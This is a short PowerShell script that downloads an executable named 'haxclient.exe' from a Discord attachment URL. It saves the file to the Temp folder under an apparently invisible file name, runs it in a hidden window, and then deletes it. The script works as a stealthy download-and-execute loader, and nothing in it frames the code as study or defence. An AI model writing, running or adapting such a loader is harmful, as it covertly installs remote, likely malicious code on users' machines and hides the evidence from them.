# Define the URL of the file and the path where it will be saved
$fileUrl = "https://cdn.discordapp.com/attachments/1176903894257897514/1208068363889147934/haxclient.exe?ex=668ab056&is=66895ed6&hm=5cfa46581b09699bd5f11d89afbf2c90fdff48cca77a69081df330de56a3b7c4&"
$outputPath = "$env:Temp\​.exe"

# Download the file from the URL
Invoke-WebRequest -Uri $fileUrl -OutFile $outputPath -ErrorAction Stop

# Execute the downloaded file in a hidden window
Start-Process -FilePath $outputPath -WindowStyle Hidden -Wait

# Clean up by removing the downloaded file
Remove-Item -Path $outputPath -Force
